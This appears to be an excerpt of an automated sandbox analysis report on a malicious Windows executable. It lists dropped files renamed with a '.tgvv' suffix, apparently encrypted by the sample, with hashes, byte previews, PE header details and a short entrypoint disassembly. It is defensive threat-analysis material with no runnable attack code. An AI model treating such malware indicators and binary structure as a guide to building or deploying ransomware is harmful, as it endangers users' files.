                                                                                                      Size (bytes):74525
                                                                                                      Entropy (8bit):7.997915094299929
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:TOSawp3XKY8K3laKNdoh2qQGRncrI7ihlMFi6jQqvOgNSK+Hh:TznKY8KwKN6h2DGRkI9FiIjSHh
                                                                                                      MD5:0EDB1E73ED353587FC10B9A591D00412
                                                                                                      SHA1:D3919A01DF388C5D7DFF8D25AE9C80A6E80FA3F5
                                                                                                      SHA-256:BCDCE0C57D5C50C6FE24BCE19F6810A540FC10B3A1011556D8C76635CA89B46C
                                                                                                      SHA-512:0D65B29A33A2A1CD14051E8853DF7A74F0C670BC39B10E9172426BB4B5179373ACC2FB1DE3D1D37E41FCE03CB6F5CEC67BAB1AA69204FFF5983BB71E6C3AF6AA
                                                                                                      Malicious:true
                                                                                                      Preview:{"ram(.."d.T....sE..q9....A..R.,...wC.e.+...B..*}..zd.L4.H.......s.S.~.9......|u.......TK..S...TV.C.....C1[{.......S.."~......0.d"........,.V..!.[D...2......l%....M..\..%.*.....4.b.....*..D..oT..@.|.b.. .2.y..kk...4....t8..T.~....G.a.r.Q..\.j|v..y.....Q..*.z8e9#.f5.....D.k3c..U.~.<.J..V.M.V...h.-.h....0.|.T...*...;.....tA...@...6..@.\...0..bt.X.z.W_C0..^.{.K...i7.EPb.=...(.G.......1.....89.*..D..J..P.k..........~.{%..7......9...*.$:.h...d......D.4.$_y.B.p.b*..s...x5...~`.70\...%..j8.E.' !.T"^..%......//.....h...oT.m..s...z.n.e~.k..*.xY@U..$.;....cLz........4.|.S..W..j9.}R(ph.3{...G..;e......2M...H.L.W..E.......'...'V0........$[.2]....h..-".E.B.l.<.......k.9.U..H2....j...K...Q...X;.@?.D .t......x.+.g5%`. ..<p.#h.....[..z.W..n.d...E..=/iW.63P.H.A.P!.y....`p......}.e.B..h........h.?..F&@h......{.!&.?.)...l;....h..*......L.Y.L ..;l.q..g>.....r.<...D..9cI....Yl...'.).[V3.h..n...4n.D...{.1L...]..h<......=.#Y.h.9..k.@Z.9......~N....F..%7

                                                                                                      C:\Users\user\Local Settings\Temp\wctEA40.tmp.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):74540
                                                                                                      Entropy (8bit):7.9977131511576856
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:Pn/n8dd+zPDTDya34l7x66GLD71pOTlZzxgrKQujtgSVx9RfLLvQ:P0WDya34ld6F/71CZV4KQCgSffLc
                                                                                                      MD5:1A0FBE300EF5F52DBD0B346493DA35CC
                                                                                                      SHA1:5E90277396633ED9599D74D52A11809453F0F5AD
                                                                                                      SHA-256:7DA9A898A9F6EF982672F8E287F7348A869E118BAC49E77CBBDAF59AF2A609EE
                                                                                                      SHA-512:7A58722FDFA80B629F0389DFC6CCFBD269FCAD03EABA6A95040DE6CD3B64A015B55B3BBDF00D6102A7226144FBB540D127B2B28963A734BC4B8CD63C2B8DD9A7
                                                                                                      Malicious:true
                                                                                                      Preview:{"ramG...\.f.p....`kw.#..:..B..l...B..W.#.;..U*r=.Gq.`...-....F...t.DT...07.w...B#.j..._.......F...t@.gz....y..@.`..........S!x.+.". 9(.D.5...-..h...&..w.iv....g...,..g..t.s.g...;p.V?..d...ck.\qb.g.z.|~....,..=..z..<..g....c...W.j8.....aL.eo..'..eM..T.t..u..I%S..F.`.*4.3nD.Q.Uec.......Q.^..#|->.;sm...f..Zk.V.^u..4...B?.B..E4+X4K8....Nr..............O..`.m8.JN....O).I.(4`....pla.E....(.q......K.....e.TL...R../.;H/....(.,n..Z".QYK......A..g;"w....I....R5.qO.n.Tx%.}NC.{W.=.&...uK...Y.q.Q..u..+'..cP^.......6Xx...q....yx..x[;..Rz..Z'.....D.R`...K..2i.5"#......2..sL..".iw6..*.=...f....w..0...r...X%...\.5.".B.X....UJ(.B..Z K.f.{.>......{.d$'l...!..=.....R...[Z.."..QKa5.."a.."._.r?.6..26r95.I.,..k...N...qQq..E.&j.h.....@)....z(@PCstEg..([.o...VA.....e.C...k..a....CS(fN.i....1..%!.y..J4..d_O...d@BL.fB3....=..`b.d....2`.. .G......T..p8..g..9...,..}.....p..e.;.\]...b.k.*.j< .T{Cd.K...$[.....#....P.....@.>.<..q.....*.1...)M..bj|~0.N.V+:...

                                                                                                      C:\Users\user\Local Settings\Temp\wctF411.tmp.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):74525
                                                                                                      Entropy (8bit):7.99775290490058
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:wuIjIpMqEa2jvVjun7MbEQT43eYw9X5tShqSzkleGD8WQSqzLGKPM:ujIpSqgbEFen0htkle7tzLk
                                                                                                      MD5:C9AFFA74C8132638E2214EF12E1511A2
                                                                                                      SHA1:E0572B0019D4B08CE1E04E081DC378ECF5AB83D7
                                                                                                      SHA-256:5D14F83FC88B9C5C06400F47459F7D64C91F2D2BA1182EE4B10DD86B8562B4E2
                                                                                                      SHA-512:CFED674F9A30DA63B0633A28DBAA61DB84BE66F2BA5BDEBCCA9E5C8115810A65C36C50DB21474B8F4968965DAE7AAB6B3DA1D6A177FE05839E04C4A3B01FDE31
                                                                                                      Malicious:true
                                                                                                      Preview:{"ram.....Q.8...m6..J...&...l.H..$.!.F...]..w...../h{F.......H......j ]...pp.....-=...f.a..E..P-.G.Mk.#.RN.d.P->.....,....|j}c/9.....}...N.I..s.fqi...+.6w.q.#.....e...\...EB.2u.Q..P>T."....M...;.S(..D.{nG.......".......E.N.,d[..lK..F'.w=..!....(U.q...5.^x......t.1<.....Ng....m./....0.j....r.x......\.. UrZ...b]J.......o;.SA.."T1....9$.M..%2._.3E. ..@y>. ...6...../m...RE....2FbH.J.0.....F;.GR....O...&....J..v.$9...&.`......m.J........!{.d.v.Ck.h{#.._...lG*^.J8..}...E..\.*.....m.6.E.`3.U.T.A.O.ET.............N....<..9.'..F..?z.O...~O.:.......V.}..a&.{...h..G....'}$89.2?...L..U.&3L.{XBO.[<.'.?....?....'k....h...y..Q<.......z`..:.W.w. ....7..J%5..^9N..Y..(.W..%..B.n..D.n..F.$..u..yC .x.o.......e?4.Q........,..."X...".?..&.3.iG).<0...jKU....#.k.Cw..m:..PB............#".S|.}k[..q.[9.B.6....l..)...$..M..]O&......@oh...+.JHK..Q.....?.O..J......H...... ..C.....L;{DI.....%XH..T..q......Z.O..W...L.....?.....R^...D.X..g....B.....;&..P.~......*.

                                                                                                      C:\Users\user\Local Settings\Temp\wctF86A.tmp.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:MS-DOS executable
                                                                                                      Category:dropped
                                                                                                      Size (bytes):42164934
                                                                                                      Entropy (8bit):7.947664208211041
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:786432:MwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I59N:pQcWxDMPnN+dk65gGUjku4vNjLjN
                                                                                                      MD5:51C72752E0D249F40F9109F6C135BAD0
                                                                                                      SHA1:F2D140BE91672A8BA77EEA7B03F32B4C306ABD79
                                                                                                      SHA-256:6207AD0AC7C0050B0121880CA8D99B0F72187406BC9526F7DBB8F038CFD2C240
                                                                                                      SHA-512:ED2519D59FABB5961C6D1EC66BBD179AA724409522908EB8CF6CD15210AEA8BFF3105EBE0A18E0147E5E821DEDC4B3337774477AEF039E2FA0CB77843D7F3307
                                                                                                      Malicious:true
                                                                                                      Preview:MZ....."..%........ .=.F.+.A.i|..b....9.P.]8jK.....5.D..p..B.m,.0.....1QR..2...).<y1.E...R.Y..p........R#.....C.-C..Rg..h...n.z..L..6{.hH..7N.C[....7y.%.'.U1...OX..n..A..."...\.1q...._0.G.{..w....X.k..............$X.*.%..8.$..{..QMA.NN..%....z..Eh<..;5%..P.K......H.....1+Veb.K.F6..h..7DME..0...j.t..Aq..Zm.w<......_f.$.7..?.na./^g.L>..`..Y...]..........B..as."B...r....`.%..qB..R..0.#W|.j.QA....?.+g.L),.v)..5..#?.....7......tY......@......a..R6g...}./<O..??...,...\s )...oIg|..7&.S.?:(X.8?T.IU.Tl.......6..M.c.B...|J0........[...%....X......o.b.Fd...%S.{.<Q|..tq.[.&2.[h.)..._]..j......-..e.O......8...".p.t.ka.s.\lK\NRiY....Nu.Hr..0.FL...o.\.6S.|H..DAf...K...]..p..X..)s?4.$0..\D6...'?i. ..*.V../c..j.71.h...8.N..N.w_.h.G..I..........'.V-a..!..&WCN..M..yk..^.]..........m"..g.T.-Pg. .tO.q...x5..bO.......O.=.0|...w....>....Z.|Z...$.g....6..ixKK.....~.EU..Y0....,)A*k52.owjj.............gl.2J0s..F.o]..RtR_...=..P=#0.VU.\+.. ..._.4`.@....0-.j...

                                                                                                      C:\Users\user\Local Settings\Temp\wmsetup.log.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1031
                                                                                                      Entropy (8bit):7.819745065617026
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:tt0qMzjziE+vAgmu/uZ1qGaqxXvfnIOpqftwrZOYcURTYqv6bD:sJiE+4jRZ1qGTffpqiZOSYqwD
                                                                                                      MD5:AA5B2FDE528B886E7DA33821E654A0B6
                                                                                                      SHA1:7293A645F32C4A35A4667EAF3D198291F485122E
                                                                                                      SHA-256:EE69F73414FA66CA33DEFB95EE2FFDDD94161F70A4278F152F588CD17D39090D
                                                                                                      SHA-512:53E76E7496F7CBCFE512556036A18B1733C599E74389E208290A949FFD90D58F3B146C3F713D4EED7F4F3ECE85DBBC408DD8B8D90EBF84BB55242065AFB86B16
                                                                                                      Malicious:false
                                                                                                      Preview:..[*W;...b..v....*j.. .3.'..J"~l./.6...9.z..d..-..y...6x%..Nh.|...T.P..0..d..8.6.'qh<...+T.~..h..ZPvU{x..>FC.^...&...3.d.@=..V.^`..@.x..KV...?c....h}U.k.:.......8.i.I.ZK}7....7.1.=w.efj.t;\.....<...W....*.....1.NW?...B....C.]....P..i.....G..v..i.]...~..nBe|W..5.:........sQ;1...lW...^q......!#..h...>.J.X.....K...}..68f6.|.B..O.....Gm2.}::..K.f-.+."....W.5...\..Zn.+.x..C......^b.Fr;....H....+n....R...6...,....w.t0..=........K....uw....W...+.z.Wq=.`.yH2..'.RS.].C5/..r.H.}j....nK.XOl%.5...%....M.U......g...j.\5....<.......M.E..l....Y...-8../T}7.\?..9.h.L*..I..N1e\p.....1^..^C..x.a_......".V.D.$.e..[..}w..q.O..S.0.c....m..X...O......Hx.oy...OFJ.*${.......e.aT_...........a...E......zr... .4[.*'..].........q.<o.#....\...m`.Y...ND.0=.M...A...A.J,m.T.}.....Q.c.O#.H.D1.L......;..3.a.E..;.7..KQ.....m..%dd.\[..L....(....+.YA.(...|........%..W....V.....*..}9...s..1......h........9..f..%....EY...-.|.5c..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698

                                                                                                      C:\Users\user\Local Settings\Temp\{02662522-698F-45B5-959E-0EC7B36298AD}.png.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6130
                                                                                                      Entropy (8bit):7.96522097165237
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:t8OKlfFC5iBopuob3g47nyVA1/nyp41PYlJat9C/7Mz+rog6RRJ3XSR7vsolX1:UA5mYB3hnR1a6J9Pqr2CRbsoll
                                                                                                      MD5:FF7E7D9E95AC00974560A56E99EC2440
                                                                                                      SHA1:6A7573C847A5634B729A09628DA43998A3F3FA95
                                                                                                      SHA-256:2CAABE0652DFF40246540C4B11DBD2C078FA1C474267261444B22383F97AAD28
                                                                                                      SHA-512:043EE837D90BC33B6D4AF1D2CE1A500F553E8B184C58FAE5C53531B4F27B44A0B620A45CCA3FFF140101EE420AFD25A6E0987CB03571E7F499B51389221EFAE8
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG..x..#.I.L..;... .9I,.bEfl.....8..F.F./....L}?......H.'E,.....u...4...2.Su.....N..%....... h.y..z...._.Ir...*&.a.%.gcp..m....#.H]4..1..o..U.fi./...nxP.'.*r..7.g.QO../<.X..{...`.......i2.[.).-r.....'..m.8.n4...G.=.aW.....0..27+...71O./1=1=.,.p.?.7.>*.\.;.}.O...M....@].a.s..n....._fc...X..@...Q...*..e.]..g.B....\.......>.FB........e.!.e.5P........L.=..k25.O.H.z.q}I..v.`..nZs..7...d\{f.->..b.n.f....Z..B...,...X6.....~[U...B.$.F.0....@B.H..`W.~..#.g.&j.N,.c...lR..'F.;^..g._.>.Z:.a=7yn.(..N..."/..k.......rZ&...{.1.q{D. .T......x.+VL/..<..*4...W.5.......}..@....l.[...;.sA..z:..1..+F..V...Raj...|k.P..g..!..aovY...."?d..Q.`d^.)m.e.....{5.....dK..6.2.l....3.w...3....tZk...m..3.}..a...r..+.xN.m.7.U...k....yD....Z.x7..4.........:i.r.``*.x.....@(.l..i.}.M>$.8.g;CW,.`...gC...G...........U...........u..h.XP.F[8._.=..r.S$X.Q.....nT&....o=...;KK..Cm.zr..cQ.&Jff3..@.^."..f%.E.8aW!w.ilr....q.f..G7j.0.......EZ.....`.....%.+7.G@....G..].V...VLu.H..u

                                                                                                      C:\Users\user\Local Settings\Temp\{139BFC28-947F-45CC-9DE4-AB0FCAEF6E9F}.png.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6130
                                                                                                      Entropy (8bit):7.97079851612105
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:lcOAGTLhHExJWClpRA6Z6rtRLIzlGD89HAONqz9OEHirwRK3gng9bXYiXipml:GtGH1ExbSzLUlGDDDzCgngRNXiq
                                                                                                      MD5:2FE1992B98832168C2425722298AF2B3
                                                                                                      SHA1:18603A830BD6D328D302E04A654C083224A10515
                                                                                                      SHA-256:4F3A48091480D481416B4EB28C2DC4DB837D24D080A7347C91A224CA8F22201A
                                                                                                      SHA-512:D0F9376C4F4E49FB35076BADA0CEDDA510F6F203A30DC9F33C8F9493820127E98D6C9EF085326B148F3F2D1B20BB55211BD81FC2BEDBAD8F7BD033308FFA9E59
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG..%}.......`..;..X~9`.b.;.su.@.%....=BL&.9sRg....X...H1..N.I...4...\..,.{%_.E..a-Z<...*0.._.. +..7..T..zD.&3../...H...C.7.c..|.5...J....X...=.;T` ....v0..>.q|..<X4.....L.JAH~dX..a.e..*2.....<..-...bjoP...U.P.A+.;.....,.&.....o.s...Gk.]...sVA.{3..7.#q..P.Pe..}.Y.Q.ml.K.}.{;k" ..L.B...S......a)0.oj..../x...>....$..h"(....M]........Ceb>....K......n|=%..?.j._.....+..p.NTr...I.k....q.6..4-.T...L...k;.....g..voj.&..^...sa..v.8.uL.f5^=..K.#..R.z....B.9.sVA....3{76T..]..Yu..T...^.,.v......F.3...OM..%....2.....w..Bm..F...c.}.*..C.AG......v]_..X..r.+...e...pS..gj....?..o;p.u..l.c.H.g...G....6@*.x.qx.....'...@.eP...}.).o..Y.3.)...8&........ .,.r.^ sg......r..,*.G]3..x...j..Q...N..4....U....j.XBb.Hbg|..^3.VM.?[...v..H.Mw....x5...s.B!...$...|.^b`..L..6*..._....&."..:.sw..D.q....'@~].pp.t!."0.G3...Ab.....3^.....#.W.q.^.M..]...LSA.Y.l..?..F.......]......G....o..[.z.F...9.i.."iR...Oh.;k...X...rJ..~n.N.n#g.PeS.5.E....7...{.+A6M.....|..O?..3..Th..E..P.

                                                                                                      C:\Users\user\Local Settings\Temp\{5871238D-BEB9-464A-931F-701C8F0FFB10}.png.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6130
                                                                                                      Entropy (8bit):7.968798865368675
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:bfusW59sbJeqa/Daf+5AHvJJshxdQkES0YEax4ETpVA4blELi/v4Kz7mM0En2roh:bf1fJeZ/DaW5gxJshn3+axhbOL2v4Qaw
                                                                                                      MD5:940A6134C3005AA0901C902300A5B9AE
                                                                                                      SHA1:0F94B2234CA2451C9B75FF090CE35B5FCF0468C0
                                                                                                      SHA-256:B463F80443E570E52B38B48ABB7F34AAC3B0598A7DDC8A6C3F8EE3B1B299BF58
                                                                                                      SHA-512:652706134F228A4B07AC7AB5CE98FF45858F36D337F624283107BBCA76252C0D69201FD371607FCF8D1A1858FC10BAEC74CA2FAF569BE6EF693D4AFFFF3FF22B
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG....y..oM.U.MT.C..h$...7a...e....(v.0...(...C..qs.x.a.n.(.e.:..?..FjH.]....P.}.oj.w....L...2?.>W..pW)r...r.i.[.3.o.X.......X...^..4,._..]O...}.......1)...n8.Z..#W...........G...^..X..9..*.}d....L{...|P.+.g.d}oe..xd....D....r.c.....3.&......HR.dX.T#...".%...x.r..Zu...?.7.c.".T..'^.........G.z.R=sD.3../...d..!..-....'.Si<C......,*._..7.~..*.N]..#T..}G1....oE...>.....A...8h.......x.w....m...(.?.7t...u..'...R.7....F.q..HV..i.5_..nVM.T....Q.-^H.%2.R.z.;...PBU..lE.q|..M.......v.#..0..X._.....J.3jo..<....uG!.....8..Ze.m.33.EG2....i....+EJ.....\e.mX.#..5..17....*Ii...k.A.P...*.T.`.x+z....x...f..%_...Y_./...F.......}....A.[..`Y_8..o.A.?.q......O39~...C..e81..5e. ...|....'.6~V>`..sb.p..5u&w%h2..'.\:...n..\g.....q.0...0`..=!.v. 0[A...v;0u.8..8....o...9....."zf....&3..g.9.Z{.....r".l.N1...0.F..8./..*.....$r2....Q....6NzO....@G......QWB..-W...S..:..G...Ev...c..C...j.T...I*...M...P.5......z~...\h....z>3.*...(.K........~..0.R..h......p...^d..

                                                                                                      C:\Users\user\Local Settings\Temp\{5F969F84-5F34-4AF8-8D36-D6D6A1668750}.png.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6130
                                                                                                      Entropy (8bit):7.972905770995576
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:WU+TuDpkmSlO6l2vGrrilGOnN1+DAoNyP0Sy1vauM6EKEev0cN6YL33mflueH5bZ:WUSSSdlbkFkAOo9Ee6pEe0cf2FZbFE2b
                                                                                                      MD5:61B7398F64670F01E2B0F6F794D8EBAF
                                                                                                      SHA1:E8289140331CFCF7BBA4282D0F9E59D2EA187251
                                                                                                      SHA-256:4443561282EEE5397F8F0F75D0EC9366BB4FC0DCD491E7B0ECC8ACA884D6CF06
                                                                                                      SHA-512:15E31A768DC80ACA8E398178426D63B17F742D1D68212CB3C17BF1625346E10DC10FB0AE7935A0BC87BDAD76A8167566DA57F041500A4A2863CE3A27D86889F8
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG....]...@<.${'...q..?.........{....n.[....7...Pr..7ML..."...X.!u.,...d..fN2r..d...>..I.&mfP.K.....;..w.z.p.Nr.B...#d.n.pt4.L.1.KH...)..Du3I.X....t.z..P...<1..p....b..~3....H|...v.....xMc.m...4.Lj..W...#..8...qhx..[.....y..m.$.{<D...4...d..e...?.|z.7...._.........0.].D...+.(.*4-..R...,.....=....}.....A..e....+.i.j?..O,..69;...5.d9&.....,...&.\y4Je5c9.....SF...ML.&%U.......&..=.v.&...8t....-|B1.f..2..M.d..:.@}..T....-.8u...>..T.DP.QBL..!V..P...b..%=.0...L..^......uU<L%...S.z..>...*80....f....S).F.(o7.......1...7......U.J...........Zo.k'.UXn..Y..83*....JX: ...+........#.a.K.R-.._.k.8.:..s...\..V...'..k....]^.F.././.....Cc...C`}R.C......."2V.......A7*.>Y.=+$p....n Rb...B..s)B..u.....X....uf..|hP.^Y.p..I.y.LuQ...%..{JZ.zU+..Y.....u......-8..8.j..n...?..M.!E..S_O_....,...K.6.g..r.q.a,..W..RE.l......m....>2.rl2H...Y9E.Z...|....z..Y..a1......r.qMV.OR0:............].k......_.w.X.>.w..M.Q.>...m*.....wm\.i%.J......Z..=.m@(2.S2t)........ .......Cu''."..J.G!...

                                                                                                      C:\Users\user\Local Settings\bowsakkdestx.txt.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1243
                                                                                                      Entropy (8bit):7.841911840574799
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:voK0Q0TOhOo2WDI9QOkwo833TWSHunsCQw7sSja4kQ4sFU1v6bD:gQ4o2Wc9Qm3HTWpntQw7sKz/OwD
                                                                                                      MD5:817929634A5EF9FBB79AF8DB46C63FEB
                                                                                                      SHA1:8E652758B34C08D04B35E098E3EDCE2F57453A04
                                                                                                      SHA-256:25E653F3E44E79EC1ABBB053F149EF812CDBED22B678E66F7D227A96F419D555
                                                                                                      SHA-512:F628EC695700D7FBB71FFEB2A1B33732E341B739186F7D1460493DB5DED3ABD27C661D0F114C3698178F6656655877EDC86A2771BF1D504702500D3330987687
                                                                                                      Malicious:false
                                                                                                      Preview:<!doc....n.....4.$.({./.$.UO......I7L.n..N......E..w*.a5"..p....I.l/.p.....W~...3-.v..M]h...M........?......b.u..\.....}+.g~...!...... .:k...+bt]h.u. m.0.3..B7..H...l..c.+._.o.FY{\\)..8+.....-W....&.VM..B*.mk5J*..>.U.....e..\.7p.......T.})Z,...fRF...{.{......7n.?|.C.C.:^....C..."a..}o.....%.?;HX|^/.DY8Ay..#.M..l;...._..TX..m..@z)<..G....E*...s-.39.....w=.,...#i.s...[...j.3.x...S.....}N..y.....1(.x1.D...s2O..F.......zl..:...Ne ..7.k,.H...........C..%.G...`VJ..~..X.<..'..?l.Sy.n]U...i..8.Fi..L....<].xx...........=.....n8...>....d.q-...&..|S.........f*.<.....x.<.N.[..`UU..B....n.5..W...8.x~[....|...g.....|..f.....X..T.Qb*..."..h...aTWq.Y....)s*...5Ty.k....9.a....5.]..+k...I..H.L....Zl...gO.........Pr...@;.5..0...(...q.]E.V....b.sM+.Y..jd..s..x.`..k&'..u..v............#x...v H.f...._].(.i...AXNQ+..?........K..?...b.....rQ.U~..=...2A...0.+.5E....vb4..m.)1..-z{M.#.A....t...b{.@ch..F=...B.@...;.....h..d...A L..^.&.8.3..c.]`$... .#....@...z..D..HL

                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1835008
                                                                                                      Entropy (8bit):4.462958955748469
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:8IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:BXD94+WlLZMM6YFHg+n
                                                                                                      MD5:82058D337F09C957DC402B785BBACA29
                                                                                                      SHA1:1AFD382A7CCE62B8F0B172C5A307F91A4D8B1970
                                                                                                      SHA-256:FE83F337DC17D32DF6A0305E652AACC9C104FCE9B8C57CAFED525F45B1516472
                                                                                                      SHA-512:8D81520058B607DC54F5B8793ACCDC5885B3D43880C706CF7362F1D8AC34B55821B14BC67987ECE8106EC3888CA92512ABA01B82BF28E0DEE443776134F956CE
                                                                                                      Malicious:false
                                                                                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZ`.qK].................................................................................................................................................................................................................................................................................................................................................E........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):6.657221882859457
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File size:1'150'976 bytes
                                                                                                      MD5:1aab5a9252e93871932cd7381693e199
                                                                                                      SHA1:3b1ee795bc70733d1820a48d2ee4e2641b124ce1
                                                                                                      SHA256:88968c3b8e6e3fce9e327cb0d92079b88a35962f0503edc0888d2d9883de87c6
                                                                                                      SHA512:f0df681492502f7986ce469557575dba532a02af562d8eb0fcf758274f0a511442ce25dcd68ba9f812d63029ff6051b3c5114a543d156344ef9fa7eaaaa1c6b6
                                                                                                      SSDEEP:24576:ZBUIKn/vwOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO8sWQHUq7:F0dwAYZt6C31WeTVRPOhs7Uq7
                                                                                                      TLSH:AB35AE02BB819171E5D341BA0DFE977E883AA9A0933A95C3D7E91C568E306D0673F3C5
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(O..l...l...l.....7.f.......+/..*...h.....9.m...../.m...a|..Q...a|7.s...a|........&.n.....8.n.....#.M...l...........d...a|3.m..

                                                                                                      File Icon

                                                                                                      Icon Hash:90cececece8e8eb0

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x424141
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x5D890137 [Mon Sep 23 17:30:31 2019 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:5
                                                                                                      OS Version Minor:1
                                                                                                      File Version Major:5
                                                                                                      File Version Minor:1
                                                                                                      Subsystem Version Major:5
                                                                                                      Subsystem Version Minor:1
                                                                                                      Import Hash:0c756c849bc7b459f78f7a5ce46cd4a7

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      call 00007F5ADC9BE5F2h
                                                                                                      jmp 00007F5ADC9B02EEh
                                                                                                      jmp 00007F5ADC9B060Ch
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      push dword ptr [ebp+18h]
                                                                                                      push dword ptr [ebp+14h]
                                                                                                      push dword ptr [ebp+10h]
                                                                                                      push dword ptr [ebp+0Ch]
                                                                                                      push dword ptr [ebp+08h]
                                                                                                      call 00007F5ADC9B064Bh
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      sub esp, 00000328h
                                                                                                      mov eax, dword ptr [0050AD20h]
                                                                                                      xor eax, ebp
                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                      cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                                      push edi
                                                                                                      je 00007F5ADC9B04BBh
                                                                                                      push dword ptr [ebp+08h]
                                                                                                      call 00007F5ADC9BED94h
                                                                                                      pop ecx
                                                                                                      and dword ptr [ebp-00000320h], 00000000h
                                                                                                      lea eax, dword ptr [ebp-0000031Ch]
                                                                                                      push 0000004Ch
                                                                                                      push 00000000h
                                                                                                      push eax
                                                                                                      call 00007F5ADC9B7733h
                                                                                                      lea eax, dword ptr [ebp-00000320h]
                                                                                                      add esp, 0Ch
                                                                                                      mov dword ptr [ebp-00000328h], eax
                                                                                                      lea eax, dword ptr [ebp-000002D0h]
                                                                                                      mov dword ptr [ebp-00000324h], eax
                                                                                                      mov dword ptr [ebp-00000220h], eax
                                                                                                      mov dword ptr [ebp-00000224h], ecx
                                                                                                      mov dword ptr [ebp-00000228h], edx
                                                                                                      mov dword ptr [ebp-0000022Ch], ebx
                                                                                                      mov dword ptr [ebp-00000230h], esi
                                                                                                      mov dword ptr [ebp-00000234h], edi
                                                                                                      mov word ptr [ebp-00000208h], ss
                                                                                                      mov word ptr [ebp-00000214h], cs
                                                                                                      mov word ptr [ebp-00000238h], ds
                                                                                                      mov word ptr [ebp-0000023Ch], es
